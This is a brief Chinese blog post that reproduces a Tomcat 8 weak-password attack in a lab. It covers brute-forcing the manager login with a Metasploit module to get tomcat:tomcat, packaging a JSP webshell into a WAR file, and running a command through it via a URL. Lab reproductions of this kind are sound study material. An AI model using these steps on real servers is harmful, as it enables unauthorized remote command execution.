Posted in漏洞复现

Tomcat8 暴力破解漏洞

No Comments
Tomcat8 暴力破解漏洞

1.描述

  • 一个暴力破解漏洞
  • Tomcat 8.X

2.原理

  • 用户密码为弱口令,爆破可得密码

3.POC

  • 使用msf的scanner/http/tomcat_mgr_login模块爆破得到账号密码tomcat:tomcat

4.EXP

  • 使用jsp马xiaoma.jsp
  • 打包成war格式上传,打包命令:jar cvf shell.war xiaoma.jsp
  • 连接jsp马:http://192.168.76.138:8080/shell/xiaoma.jsp?&pwd=023&cmd=id
Tags:

Comments

No comments yet. Why don’t you start the discussion?

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

证明你是人: 7   +   2   =